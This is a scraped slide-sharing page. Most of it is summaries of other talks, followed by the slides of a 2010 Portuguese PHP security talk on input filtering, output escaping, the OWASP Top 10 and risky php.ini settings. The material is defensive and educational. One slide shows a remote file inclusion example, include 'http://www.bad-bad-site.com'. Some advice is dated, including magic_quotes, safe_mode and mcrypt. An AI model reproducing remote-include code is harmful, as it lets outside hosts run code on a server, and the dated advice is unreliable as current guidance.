O documento discute princípios e técnicas de segurança em PHP, incluindo aplicar camadas de segurança, classificar informações confidenciais, filtrar inputs, escapar outputs, e configurações de segurança como register_globals e magic_quotes_gpc.
This document summarizes 25 years of space and technology projects supported by NASA in polar regions including Antarctica and the Arctic. Some key accomplishments include the first computers, satellite phone calls and emails from Antarctica in 1984. Other milestones include the first long duration balloon flight from Antarctica in 1988, establishing satellite communication links to Antarctica in 1994, and conducting the first classroom lesson at the North Pole in 2001 using portable technology. The document also describes solutions for enabling students to process satellite weather data in real-time using early PC technology.
A palestra apresenta como desenvolver aplicações web com ASP.NET MVC e Jquery, destacando que a combinação dos frameworks permite controle total da interface e requisições, processamento flexível no cliente e servidor, alta testabilidade, velocidade, evolução constante e facilidade de uso, incluindo recursos avançados como AJAX. O palestrante encerra agradecendo a audiência.
O documento resume a história da empresa MercadoLivre desde sua fundação em 1999 até 2010, destacando seu crescimento e sucesso em democratizar o comércio online na América Latina. O texto também discute as tendências de compras móveis e redes sociais para o futuro do comércio eletrônico.
This document discusses the early history of computer networking and the internet. It describes how the ARPANET was developed in the 1960s to connect computer research labs. An open standards process and the Network Working Group emerged to develop protocols like TCP/IP. As other networks connected to ARPANET and it grew, organizations like ICANN, IETF, and IAB were formed to coordinate technical standards and management of internet resources. The document discusses some security challenges that arose as the internet became more open and popular, such as DNS cache poisoning, and how DNSSEC was developed to help address these issues.
The document summarizes Music Hack Day, an event that brings together developers and music industry representatives to build new tools and applications using music APIs over a 24-hour period. Over 200 music and tech companies participated, with over 3000 total participants worldwide. During the event, hundreds of hacks were built using available building blocks like artist data, playlists, and audio identification tools. The document highlights several example projects created at Music Hack Day and poses questions about how these proofs-of-concept could be further developed.
O documento descreve a história e o estado atual da tecnologia Java e da comunidade OpenJDK. Ele detalha o lançamento do Java como open source em 2006, o crescimento da comunidade ao redor do projeto OpenJDK e como qualquer pessoa pode contribuir para manter o Java livre.
This document summarizes 25 years of space and technology projects supported by NASA in polar regions including Antarctica and the Arctic. Some key accomplishments include the first computers, satellite phone calls and emails from Antarctica in 1984. Other milestones include the first long duration balloon flight from Antarctica in 1988, establishing satellite communication links to Antarctica in 1994, and conducting the first classroom lesson at the North Pole in 2001 using portable technology. The document also describes solutions for enabling students to process satellite weather data in real-time using early PC technology.
A palestra apresenta como desenvolver aplicações web com ASP.NET MVC e Jquery, destacando que a combinação dos frameworks permite controle total da interface e requisições, processamento flexível no cliente e servidor, alta testabilidade, velocidade, evolução constante e facilidade de uso, incluindo recursos avançados como AJAX. O palestrante encerra agradecendo a audiência.
O documento resume a história da empresa MercadoLivre desde sua fundação em 1999 até 2010, destacando seu crescimento e sucesso em democratizar o comércio online na América Latina. O texto também discute as tendências de compras móveis e redes sociais para o futuro do comércio eletrônico.
This document discusses the early history of computer networking and the internet. It describes how the ARPANET was developed in the 1960s to connect computer research labs. An open standards process and the Network Working Group emerged to develop protocols like TCP/IP. As other networks connected to ARPANET and it grew, organizations like ICANN, IETF, and IAB were formed to coordinate technical standards and management of internet resources. The document discusses some security challenges that arose as the internet became more open and popular, such as DNS cache poisoning, and how DNSSEC was developed to help address these issues.
The document summarizes Music Hack Day, an event that brings together developers and music industry representatives to build new tools and applications using music APIs over a 24-hour period. Over 200 music and tech companies participated, with over 3000 total participants worldwide. During the event, hundreds of hacks were built using available building blocks like artist data, playlists, and audio identification tools. The document highlights several example projects created at Music Hack Day and poses questions about how these proofs-of-concept could be further developed.
O documento descreve a história e o estado atual da tecnologia Java e da comunidade OpenJDK. Ele detalha o lançamento do Java como open source em 2006, o crescimento da comunidade ao redor do projeto OpenJDK e como qualquer pessoa pode contribuir para manter o Java livre.
O documento apresenta a plataforma Windows Azure da Microsoft, incluindo seus principais serviços como Compute, Storage, Database e Service Bus. A plataforma oferece um ambiente virtualizado na nuvem para executar aplicativos de forma escalável e disponível.
Computação acelerada – a era das ap us roberto brandão, ciênciaCampus Party Brasil
This document summarizes presentations given by Roberto Brandao from AMD Latin America on the future of GPUs and accelerated computing. It discusses the evolution of x86 processors towards more cores and memory channels. It presents how GPUs can be used as accelerators, providing over 100x more computational power than CPUs. The document introduces accelerated processing units (APUs), which integrate CPU and GPU cores on a single chip to provide powerful yet efficient computing. It promotes OpenCL as an open standard for programming across CPUs and GPUs for heterogeneous computing.
O documento apresenta Arduino, um sistema eletrônico de hardware e software open-source popular para prototipagem eletrônica. Detalha as especificações técnicas do Arduino Duemilanove e Nano, incluindo o microcontrolador ATMega328, memória, pinos de entrada e saída. Também menciona recursos como PWM, software de design Fritzing e projetos open-source de ensino sobre Arduino.
O documento apresenta uma introdução ao ASP.NET 4.0 para iniciantes, descrevendo como desenvolver aplicações web usando ferramentas como Visual Studio 2010 Beta 2. É fornecida uma visão geral dos principais recursos do ASP.NET como Web Forms, AJAX, MVC e Dynamic Data. Algumas demonstrações são apresentadas para ilustrar funcionalidades como SEO, consultas de dados, gráficos e segurança.
O documento discute como adaptar sites para dispositivos móveis de forma a melhorar o desempenho e a experiência do usuário, abordando tópicos como market share de acesso móvel, recursos nativos vs web, cache manifest, armazenamento local e orientação da tela.
The document discusses standards and technologies for interactive digital television (iTV) using Ginga middleware. It covers:
- Ginga as the standard middleware for Brazil's ISDB-T digital TV system.
- Related standards including ABNT standards for Ginga-NCL and Ginga-J, as well as ITU standards for NCL and Ginga-NCL for IPTV and cable services.
- Software tools for Ginga including a reference implementation, source code repository, and tools for authoring, development, execution and testing of iTV applications.
- Ways for developers and users to get involved with and contribute to the open source Ginga
O documento discute como aumentar o engajamento do público no site de uma organização usando as APIs do Windows Live. Ele recomenda usar a Messenger Web Toolkit para trazer novos usuários ao site, fazer com que as pessoas passem mais tempo nele e retornem ao site. O documento também fornece detalhes sobre os recursos da plataforma Windows Live no futuro.
This document appears to be notes from a discussion on gaming and the web. It discusses the submission of over 170 games to a competition, with around 50 being good submissions. Specific games are named, and topics discussed include the web as a gaming platform, why plugins are not used, and what the web needs for game development like WebGL, HTML5 audio/video tags, canvas, CSS3 and fast JavaScript. Making a living as an independent game developer is also discussed.
Perspectives On Microsoft And Open Source F Y 10 Customer PresentationCampus Party Brasil
This document discusses Microsoft's "Open Edge" strategy of combining open source software (OSS) with their commercial core products. It lists several ways Microsoft incorporates OSS, such as supporting PHP on IIS, jQuery in Visual Studio, OpenPegasus for System Center, and over 300 OSS components in SharePoint. It also discusses Microsoft contributions to OSS projects like Linux kernel drivers for Hyper-V, AMQP protocol support in Apache Qpid, and integrations with Moodle and Chem4Word. The strategy aims to provide customers choice and flexibility through an open hybrid environment.
O documento discute os princípios do Coding Dojo, um método de aprendizado de programação que enfatiza a prática constante através de exercícios em pares e em grupo, com foco no desenvolvimento orientado a testes. O documento lista alguns dos termos-chave do método como Kata, Randori e Pair Programming e menciona alguns eventos relacionados como Arduino Hack Days e PythOnCampus.
This document discusses an introduction to object-oriented programming in PHP. It covers key concepts like classes, objects, attributes, methods, inheritance, polymorphism, interfaces, exceptions, and more. It emphasizes thinking in an object-oriented way when programming in PHP 5.
The document is a presentation about the Apache OFBiz open source ERP software. It provides an overview of OFBiz, describing it as a turn-key software for managing business operations and a library of pre-made processes that can be used to build custom business applications. It outlines features like e-commerce, warehouse management, and accounting. It also discusses how OFBiz uses an entity engine for data access and service engine for functions, and how the community is critical for sharing business practices and code.
O documento discute as vantagens do WordPress como plataforma para desenvolvimento de sites e redes sociais. Inicialmente criado para blogs, o WordPress evoluiu para ser um sistema de gerenciamento de conteúdo (CMS) flexível com milhares de plugins e temas disponíveis que o tornam uma ferramenta poderosa e amigável para criação de sites de todos os portes.
Buracos negros são regiões do espaço-tempo onde a gravidade é tão forte que nada, nem mesmo a luz, pode escapar. Eles se formam quando estrelas massivas colapsam ao final de suas vidas e podem ser detectados quando a matéria que cai neles emite radiação. A fonte Cygnus X-1 é um possível buraco negro detectado por variar e desaparecer periodicamente sua emissão de raios-X.
O objetivo da palestra é valorizar o esforço dos programadores que criaram os jogos clássicos do Atari 2600. Uma apresentação básica da arquitetura (em particular das limitações de CPU/memória e do chip TIA), montagem e rodagem, em um emulador, de um pequeno experimento, demonstrando a complexidade envolvida na criação de um jogo completo.
Palestrante
Carlos Duarte do Nascimento
Matemático pelo IME/USP e Gerente de Produto no Apontador, faz "artesanato" de software há 20 anos, defendendo plataformas e conteúdo livres.
Uma palestra para explorar o Google App Engine (GAE), uma plataforma de desenvolvimento e hospedagem de aplicações web na nuvem. Aplicativos fáceis de criar, manter e escalar.
Palestrante: Carlos Duarte do Nascimento
Matemático pelo IME/USP e Gerente de Produto no Apontador, faz "artesanato" de software há 20 anos, defendendo plataformas e conteúdo livres.
Quem nunca perdeu um arquivo após deletar algo por engano na máquina fotográfica, computador ou celular? Ou ainda, quem nunca formatou um pendrive ou partição de disco sem querer? Veja como utilizar técnicas de Forense Computacional para recuperar arquivos apagados. Recuperações a partir de dados ainda existentes na memória RAM e demonstrações ao vivo.
Palestrante: João Eriberto Mota Filho
Oficial de Cavalaria do Exército Brasileiro. Gerente de Rede e de Segurança em Rede do Gabinete do Comandante do Exército. Coordenador e professor da pós-graduação em Software Livre na Universidade Católica de Brasília (UCB) e professor da pós-graduação em Perícia Digital (UCB). Autor dos livros Linux & Seus Servidores (2000), Pequenas Redes com Microsoft Windows (2001) e Descobrindo o Linux (2ª edição em 2007).
Com tantas app stores, fabricantes e sistemas operacionais diferentes, em qual deles devemos apostar? Esta provavelmente é a sua maior dúvida se você está pensando em lançar uma start-up, criar jogos ou apps para seus serviços web no mundo mobile. Saiba onde investir e os porquês de cada plataforma. Conheça diferentes SDK cross-platform, apostas em Mobile Web app ou Nativo App.
Palestrante: Igor Costa
Tem 12 anos de experiência no mercado de software. É co-fundador da RIACycle, empresa brasileira dedicada a criar apps para web/mobile e a ensinar uma vasta rede de desenvolvedores. Palestrante assíduo, já particiou de vários eventos como o iMasters Intercon, Campus Party, Just Java, Flash Camp Brasil, Flex for Kids, Flex Mania, Flash Open Source Conference, faculdades, etc.
O documento discute tempestades solares, incluindo explosões solares (flares) e ejeções de massa coronal. Ele explica que essas tempestades solares emitem radiação e partículas energéticas que podem interferir nos sistemas elétricos e de comunicações na Terra e causar danos a satélites e espaçonaves. O documento também discute o ciclo solar de 11 anos e teorias não comprovadas sobre profecias maias relacionadas a tempestades solares.
Este documento discute a busca por planetas além do nosso Sistema Solar. Resume os principais métodos utilizados para detectar planetas extrassolares, incluindo velocidade radial, trânsitos, lente gravitacional e detecção direta. Também descreve alguns dos principais satélites dedicados a essa busca, como CoRoT, Kepler e Gaia.
O documento apresenta a plataforma Windows Azure da Microsoft, incluindo seus principais serviços como Compute, Storage, Database e Service Bus. A plataforma oferece um ambiente virtualizado na nuvem para executar aplicativos de forma escalável e disponível.
Computação acelerada – a era das ap us roberto brandão, ciênciaCampus Party Brasil
This document summarizes presentations given by Roberto Brandao from AMD Latin America on the future of GPUs and accelerated computing. It discusses the evolution of x86 processors towards more cores and memory channels. It presents how GPUs can be used as accelerators, providing over 100x more computational power than CPUs. The document introduces accelerated processing units (APUs), which integrate CPU and GPU cores on a single chip to provide powerful yet efficient computing. It promotes OpenCL as an open standard for programming across CPUs and GPUs for heterogeneous computing.
O documento apresenta Arduino, um sistema eletrônico de hardware e software open-source popular para prototipagem eletrônica. Detalha as especificações técnicas do Arduino Duemilanove e Nano, incluindo o microcontrolador ATMega328, memória, pinos de entrada e saída. Também menciona recursos como PWM, software de design Fritzing e projetos open-source de ensino sobre Arduino.
O documento apresenta uma introdução ao ASP.NET 4.0 para iniciantes, descrevendo como desenvolver aplicações web usando ferramentas como Visual Studio 2010 Beta 2. É fornecida uma visão geral dos principais recursos do ASP.NET como Web Forms, AJAX, MVC e Dynamic Data. Algumas demonstrações são apresentadas para ilustrar funcionalidades como SEO, consultas de dados, gráficos e segurança.
O documento discute como adaptar sites para dispositivos móveis de forma a melhorar o desempenho e a experiência do usuário, abordando tópicos como market share de acesso móvel, recursos nativos vs web, cache manifest, armazenamento local e orientação da tela.
The document discusses standards and technologies for interactive digital television (iTV) using Ginga middleware. It covers:
- Ginga as the standard middleware for Brazil's ISDB-T digital TV system.
- Related standards including ABNT standards for Ginga-NCL and Ginga-J, as well as ITU standards for NCL and Ginga-NCL for IPTV and cable services.
- Software tools for Ginga including a reference implementation, source code repository, and tools for authoring, development, execution and testing of iTV applications.
- Ways for developers and users to get involved with and contribute to the open source Ginga
O documento discute como aumentar o engajamento do público no site de uma organização usando as APIs do Windows Live. Ele recomenda usar a Messenger Web Toolkit para trazer novos usuários ao site, fazer com que as pessoas passem mais tempo nele e retornem ao site. O documento também fornece detalhes sobre os recursos da plataforma Windows Live no futuro.
This document appears to be notes from a discussion on gaming and the web. It discusses the submission of over 170 games to a competition, with around 50 being good submissions. Specific games are named, and topics discussed include the web as a gaming platform, why plugins are not used, and what the web needs for game development like WebGL, HTML5 audio/video tags, canvas, CSS3 and fast JavaScript. Making a living as an independent game developer is also discussed.
Perspectives On Microsoft And Open Source F Y 10 Customer PresentationCampus Party Brasil
This document discusses Microsoft's "Open Edge" strategy of combining open source software (OSS) with their commercial core products. It lists several ways Microsoft incorporates OSS, such as supporting PHP on IIS, jQuery in Visual Studio, OpenPegasus for System Center, and over 300 OSS components in SharePoint. It also discusses Microsoft contributions to OSS projects like Linux kernel drivers for Hyper-V, AMQP protocol support in Apache Qpid, and integrations with Moodle and Chem4Word. The strategy aims to provide customers choice and flexibility through an open hybrid environment.
O documento discute os princípios do Coding Dojo, um método de aprendizado de programação que enfatiza a prática constante através de exercícios em pares e em grupo, com foco no desenvolvimento orientado a testes. O documento lista alguns dos termos-chave do método como Kata, Randori e Pair Programming e menciona alguns eventos relacionados como Arduino Hack Days e PythOnCampus.
This document discusses an introduction to object-oriented programming in PHP. It covers key concepts like classes, objects, attributes, methods, inheritance, polymorphism, interfaces, exceptions, and more. It emphasizes thinking in an object-oriented way when programming in PHP 5.
The document is a presentation about the Apache OFBiz open source ERP software. It provides an overview of OFBiz, describing it as a turn-key software for managing business operations and a library of pre-made processes that can be used to build custom business applications. It outlines features like e-commerce, warehouse management, and accounting. It also discusses how OFBiz uses an entity engine for data access and service engine for functions, and how the community is critical for sharing business practices and code.
O documento discute as vantagens do WordPress como plataforma para desenvolvimento de sites e redes sociais. Inicialmente criado para blogs, o WordPress evoluiu para ser um sistema de gerenciamento de conteúdo (CMS) flexível com milhares de plugins e temas disponíveis que o tornam uma ferramenta poderosa e amigável para criação de sites de todos os portes.
Buracos negros são regiões do espaço-tempo onde a gravidade é tão forte que nada, nem mesmo a luz, pode escapar. Eles se formam quando estrelas massivas colapsam ao final de suas vidas e podem ser detectados quando a matéria que cai neles emite radiação. A fonte Cygnus X-1 é um possível buraco negro detectado por variar e desaparecer periodicamente sua emissão de raios-X.
O objetivo da palestra é valorizar o esforço dos programadores que criaram os jogos clássicos do Atari 2600. Uma apresentação básica da arquitetura (em particular das limitações de CPU/memória e do chip TIA), montagem e rodagem, em um emulador, de um pequeno experimento, demonstrando a complexidade envolvida na criação de um jogo completo.
Palestrante
Carlos Duarte do Nascimento
Matemático pelo IME/USP e Gerente de Produto no Apontador, faz "artesanato" de software há 20 anos, defendendo plataformas e conteúdo livres.
Uma palestra para explorar o Google App Engine (GAE), uma plataforma de desenvolvimento e hospedagem de aplicações web na nuvem. Aplicativos fáceis de criar, manter e escalar.
Palestrante: Carlos Duarte do Nascimento
Matemático pelo IME/USP e Gerente de Produto no Apontador, faz "artesanato" de software há 20 anos, defendendo plataformas e conteúdo livres.
Quem nunca perdeu um arquivo após deletar algo por engano na máquina fotográfica, computador ou celular? Ou ainda, quem nunca formatou um pendrive ou partição de disco sem querer? Veja como utilizar técnicas de Forense Computacional para recuperar arquivos apagados. Recuperações a partir de dados ainda existentes na memória RAM e demonstrações ao vivo.
Palestrante: João Eriberto Mota Filho
Oficial de Cavalaria do Exército Brasileiro. Gerente de Rede e de Segurança em Rede do Gabinete do Comandante do Exército. Coordenador e professor da pós-graduação em Software Livre na Universidade Católica de Brasília (UCB) e professor da pós-graduação em Perícia Digital (UCB). Autor dos livros Linux & Seus Servidores (2000), Pequenas Redes com Microsoft Windows (2001) e Descobrindo o Linux (2ª edição em 2007).
Com tantas app stores, fabricantes e sistemas operacionais diferentes, em qual deles devemos apostar? Esta provavelmente é a sua maior dúvida se você está pensando em lançar uma start-up, criar jogos ou apps para seus serviços web no mundo mobile. Saiba onde investir e os porquês de cada plataforma. Conheça diferentes SDK cross-platform, apostas em Mobile Web app ou Nativo App.
Palestrante: Igor Costa
Tem 12 anos de experiência no mercado de software. É co-fundador da RIACycle, empresa brasileira dedicada a criar apps para web/mobile e a ensinar uma vasta rede de desenvolvedores. Palestrante assíduo, já particiou de vários eventos como o iMasters Intercon, Campus Party, Just Java, Flash Camp Brasil, Flex for Kids, Flex Mania, Flash Open Source Conference, faculdades, etc.
O documento discute tempestades solares, incluindo explosões solares (flares) e ejeções de massa coronal. Ele explica que essas tempestades solares emitem radiação e partículas energéticas que podem interferir nos sistemas elétricos e de comunicações na Terra e causar danos a satélites e espaçonaves. O documento também discute o ciclo solar de 11 anos e teorias não comprovadas sobre profecias maias relacionadas a tempestades solares.
Este documento discute a busca por planetas além do nosso Sistema Solar. Resume os principais métodos utilizados para detectar planetas extrassolares, incluindo velocidade radial, trânsitos, lente gravitacional e detecção direta. Também descreve alguns dos principais satélites dedicados a essa busca, como CoRoT, Kepler e Gaia.
3 (dos 5) dados incríveis sobre o LHC
[A] Lugar mais frio da galáxia (- 271 oC)
[B] Um dos lugares mais quentes no Universo (10.106.109 oC)
[C] Mais vazio que o espaço exterior
O documento fornece detalhes sobre o Large Hadron Collider (LHC) no CERN, destacando 3 de seus 5 dados mais incríveis: seu sistema de refrigeração criogênica produz as temperaturas mais baixas da galáxia; as colisões de prótons
Este documento fornece instruções para construir uma luneta (telescópio refrator) de baixo custo utilizando lentes e tubos. Explica os conceitos básicos de óptica envolvidos no funcionamento de um refrator e fornece dicas sobre montagem, uso e sites para mais informações sobre astronomia.
Hardware livre Arduino: eletrônica e robótica com hardware e software livresCampus Party Brasil
O documento apresenta uma introdução ao Arduino, um hardware livre para eletrônica e robótica. Apresenta os objetivos do Arduino, como licenciamento de hardware livre, modelos de placas como Arduino Uno e shields. Explica brevemente o funcionamento básico do Arduino com instruções como pinMode, digitalWrite e delay. Demonstra também o controle de um servo motor usando PWM e biblioteca Servo.
Este documento discute a educação inclusiva e o uso da robótica pedagógica para apoiar alunos com deficiência. Em particular, ele explora (1) o desenvolvimento de maquetes táteis sonoras para fornecer informações espaciais para pessoas cegas e (2) o mapeamento tátil sonoro do campus da UNICAMP para facilitar a navegação independente. O documento argumenta que a robótica pedagógica pode promover a autonomia e inclusão de alunos com deficiência.
Fazendo do jeito certo: criando jogos sofisticados com DirectXCampus Party Brasil
Tecnologias vêm e vão, mas apenas uma permanece ao longo do tempo: o DirectX. Com o novo Windows 8 à vista, não poderia ser diferente e, nesta palestra, iremos explorar esta tecnologia, suas características e recursos, principalmente sob os novos aspectos necessários para a criação de jogos para Windows 8 e a interface Metro.
Palestrante: José Antonio Leal de Farias
CEO da Stairs Game Studio, professor, bacharel em Ciências da Computação pela UFCG, XNA/Directx Microsoft Most Valuable Professional, autor de livros e artigos publicados no Brasil e nos Estados Unidos e programador profissional há mais de uma década.
This document provides an overview and introduction to Linux and open source. It discusses the history and origins of Linux from 1969 with Unix at Bell Labs to Linus Torvalds starting the Linux kernel project in 1991. It describes the key components of an operating system distribution and popular distributions like Red Hat, Debian, and Fedora. The document outlines how Linux has been used for servers, embedded systems, supercomputers, and desktops. It also discusses open source licensing and communities and how to get started with Linux.
Este documento discute a educação inclusiva e o uso da robótica pedagógica para promover a autonomia de pessoas com deficiência. Em particular, ele descreve (1) um projeto de pesquisa que desenvolve maquetes táteis e sonoras para ensinar conceitos geográficos; e (2) um mapa tátil e sonoro da Universidade Estadual de Campinas para guiar pessoas com deficiência visual.
Gestão e monitoramento de redes e dispositivos com Software LivreCampus Party Brasil
O documento descreve as funcionalidades e benefícios do Zabbix para monitoramento de ativos. O Zabbix permite monitorar ativos de forma proativa, detectar falhas antecipadamente e analisar a qualidade dos serviços de baixo custo. Ele é uma solução escalável com interface amigável que usa agentes para coletar métricas de ativos e dispara ações com base em triggers.
O documento apresenta a suíte de software livre Kicad para projeto de circuitos impressos, descrevendo seus principais módulos (Eeschema, Cvpcb, Pcbnew, Gerbview), seu idealizador Jean-Pierre Charras e referências sobre o tema.
Ideias e ferramentas para publicar conteúdo de forma relevante aproveitando os recursos das redes sociais tendo como base o caso do site Vida de Programador.
Palestrante: André Noel
Bacharel em Ciência da Computação pela Universidade Estadual de Maringá é desenvolvedor web desde 2002, mesmo ano em que aderiu ao Linux. Atualmente é membro do Conselho da Comunidade Ubuntu-BR e autor do site Vida de Programador.
O documento discute o tema de Cloud Computing e suas tendências. Aborda o que é Cloud Computing, suas vantagens como economia de infraestrutura e acessibilidade, cenários propícios e impróprios para sua adoção, e tendências como maior segurança e desempenho. Também discute a relação entre Cloud Computing e Virtualização.
As classes de modelagem podem ser comparadas a moldes ou
formas que definem as características e os comportamentos dos
objetos criados a partir delas. Vale traçar um paralelo com o projeto de
um automóvel. Os engenheiros definem as medidas, a quantidade de
portas, a potência do motor, a localização do estepe, dentre outras
descrições necessárias para a fabricação de um veículo
A linguagem C# aproveita conceitos de muitas outras linguagens,
mas especialmente de C++ e Java. Sua sintaxe é relativamente fácil, o que
diminui o tempo de aprendizado. Todos os programas desenvolvidos devem
ser compilados, gerando um arquivo com a extensão DLL ou EXE. Isso torna a
execução dos programas mais rápida se comparados com as linguagens de
script (VBScript , JavaScript) que atualmente utilizamos na internet
Em um mundo cada vez mais digital, a segurança da informação tornou-se essencial para proteger dados pessoais e empresariais contra ameaças cibernéticas. Nesta apresentação, abordaremos os principais conceitos e práticas de segurança digital, incluindo o reconhecimento de ameaças comuns, como malware e phishing, e a implementação de medidas de proteção e mitigação para vazamento de senhas.
PRODUÇÃO E CONSUMO DE ENERGIA DA PRÉ-HISTÓRIA À ERA CONTEMPORÂNEA E SUA EVOLU...Faga1939
Este artigo tem por objetivo apresentar como ocorreu a evolução do consumo e da produção de energia desde a pré-história até os tempos atuais, bem como propor o futuro da energia requerido para o mundo. Da pré-história até o século XVIII predominou o uso de fontes renováveis de energia como a madeira, o vento e a energia hidráulica. Do século XVIII até a era contemporânea, os combustíveis fósseis predominaram com o carvão e o petróleo, mas seu uso chegará ao fim provavelmente a partir do século XXI para evitar a mudança climática catastrófica global resultante de sua utilização ao emitir gases do efeito estufa responsáveis pelo aquecimento global. Com o fim da era dos combustíveis fósseis virá a era das fontes renováveis de energia quando prevalecerá a utilização da energia hidrelétrica, energia solar, energia eólica, energia das marés, energia das ondas, energia geotérmica, energia da biomassa e energia do hidrogênio. Não existem dúvidas de que as atividades humanas sobre a Terra provocam alterações no meio ambiente em que vivemos. Muitos destes impactos ambientais são provenientes da geração, manuseio e uso da energia com o uso de combustíveis fósseis. A principal razão para a existência desses impactos ambientais reside no fato de que o consumo mundial de energia primária proveniente de fontes não renováveis (petróleo, carvão, gás natural e nuclear) corresponde a aproximadamente 88% do total, cabendo apenas 12% às fontes renováveis. Independentemente das várias soluções que venham a ser adotadas para eliminar ou mitigar as causas do efeito estufa, a mais importante ação é, sem dúvidas, a adoção de medidas que contribuam para a eliminação ou redução do consumo de combustíveis fósseis na produção de energia, bem como para seu uso mais eficiente nos transportes, na indústria, na agropecuária e nas cidades (residências e comércio), haja vista que o uso e a produção de energia são responsáveis por 57% dos gases de estufa emitidos pela atividade humana. Neste sentido, é imprescindível a implantação de um sistema de energia sustentável no mundo. Em um sistema de energia sustentável, a matriz energética mundial só deveria contar com fontes de energia limpa e renováveis (hidroelétrica, solar, eólica, hidrogênio, geotérmica, das marés, das ondas e biomassa), não devendo contar, portanto, com o uso dos combustíveis fósseis (petróleo, carvão e gás natural).
8. Segurança em camadas
Segurança nunca é demais
Segurança em profundidade
Aplique camadas de segurança em tudo que puder
Não conte com a bondade no mundo
Friday, January 29, 2010
10. Informação Confidencial
Classifique tudo que for sensível
Impeça o acesso a essa informação
Lei do menor privilégio
Se o usuário não precisa ver, não deixe.
Friday, January 29, 2010
13. Segurança x Usabilidade
Procure implementar segurança transparente ao usuário
Se não for possível:
Pense no Risco e na Usabilidade
Tenha em mente que dependemos de usuários felizes
NUNCA esqueça da usabilidade
Friday, January 29, 2010
15. Vigie sempre
Nunca confie no usuário
Nunca confie em outras aplicações
Nunca confie.
Mantenha registro da onde, de quem e quando a informação for
gerada
Friday, January 29, 2010
16. Filtre o INPUT
Identifique o input
Filtre o input
Friday, January 29, 2010
17. Identificando Input
O input pode vir de diversos lugares
Formulário
Outra aplicação
Sistema
Friday, January 29, 2010
31. htmlentities()
Converte TODO caractere para entidade HTML correspondente
Segundo e terceiro parâmetro são opcionais
Segundo: como as aspas (duplas e simples) seão tratadas
Padrão: ENT_COMPAT
ENT_QUOTES: Converte ambas para entidade HTML
Terceiro: encoding do output
Padrão: ISO-8859-1
Friday, January 29, 2010
33. Brindes
Extensão dos arquivos sempre “.php”
Dentro do DocRoot, só o necessário
Mantenha seu código simples e encapsulado
Favoreça Orientação a Objetos
Friday, January 29, 2010
34. TOP 10 OWASP
Lista de riscos de Segurança (rc1) de 2010
Injection
XSS
Quebra de Autenticação e Problemas de Sessões
Referências não seguras a Objetos
CSRF
Erros de Configuração
Falhas ao restringir acesso a URLs
Redirecionamentos e Encaminhamentos não seguros
Métodos de criptografia não seguros
Segurança insuficiente no transporte de dados
Friday, January 29, 2010
35. Sql Injection
O que é ?
Envio de comandos não tratados pela aplicação para o
interpretador
Impacto
Toda a base de dados pode ser lida ou modificada
Pode garantir acesso ao banco de dados ou até ao Sistema
Operacional
Friday, January 29, 2010
36. Cross Site Scripting (XSS)
O que é ?
Dados do atacante são enviados ao navegador do cliente
Impacto
Roubo de sessão, de dados sensíveis, phishing
Friday, January 29, 2010
37. Cross Site Request Forgery
(CSRF)
O que é ?
O navegador é “enganado” e envia um comando a um site
vulnerável
Impacto
Iniciar transações (tranferência, logout, cancelamento)
Acesso sensível a dados
Mudança de dados da conta
Friday, January 29, 2010
44. Problemas de Configuração
O que é ?
Configuração de rede e do servidor de aplicação
Impacto
Acesso ao Sistema Operacional através de um problema
conhecido
Acesso a dados da aplicação
Friday, January 29, 2010
45. allow_url_fopen
Permite acesso a recursos remotos
Valor padrão: On
Aliado ao ‘allow_url_include’ (> 5.2) é muito perigoso
Friday, January 29, 2010
46. allow_url_fopen
$conteudo = file_get_contents(“http://www.google.com”)
Friday, January 29, 2010
47. allow_url_fopen
include “http://www.bad-bad-site.com”
Friday, January 29, 2010
48. register_globals
Exporta índices de super globais para variáveis comuns
Impede que se identifique a origem do dado
Padrão
< 4.2: On
>4.2: Off
Friday, January 29, 2010
52. magic_quotes_gpc
Escapa todos os dados em $_GET, $_POST e $_COOKIE
Usa addslashes() e não escape nativo do seu banco
Complica seu algoritmo de filtro
Padrão: On
Obsoleto no PHP 5.3
Removido do PHP 6
Friday, January 29, 2010
53. display_errors
Exibe no output erros do PHP
DEVE ser usado no desenvolvimento
DEVE ser desligado na produção
Padrão: On
Friday, January 29, 2010
54. error_reporting
Controla os níveis de erros que devem ser exibidos
Ajuda na identificação de erros e boas práticas
Recomendado: -1
Friday, January 29, 2010
55. safe_mode
Restringe algumas funcões tidas como prejudiciais
Verifica se o dono do arquivo a ser executado é o mesmo do
script em execução
Melhora a segurança
Não é suficiente
Padrão: Off
Friday, January 29, 2010
56. Acesso a URLs Restritas
O que é?
Permitir que um usuário possa forjar uma autorização a uma
URL sensível
Impacto
Permitir ações privilegiadas a qualquer pessoa
Friday, January 29, 2010
57. Redirecionamentos Inválidos
O que é?
Enviar o usuário para uma URL não valida
Impacto
Phishing
Friday, January 29, 2010
58. Criptografia Não Segura
O que é?
Falha na identificação de todos os dados que devem ser
criptografados
Uso de criptografia não segura (md5, sha1)
Impacto
Acesso a dados sensíveis
Solução
mcrypt
Friday, January 29, 2010
59. Transporte de dados
O que é?
Falta de segurança na troca de informações sensíveis
Impacto
Acesso a dados sensíveis
Solução
SSL ou TLS para transporte dos dados
Friday, January 29, 2010
60. Perguntas ?
Augusto Pascutti
augusto@phpsp.org.br
@augustohp
Friday, January 29, 2010
61. Referências
Essential PHP Security - Chris Chiflett - O’Reilly
http://www.owasp.org/
http://phpsp.org.br/category/phpsp/phpspcast/
Segurança em PHP - Márcio Pessoa - Novatec
Friday, January 29, 2010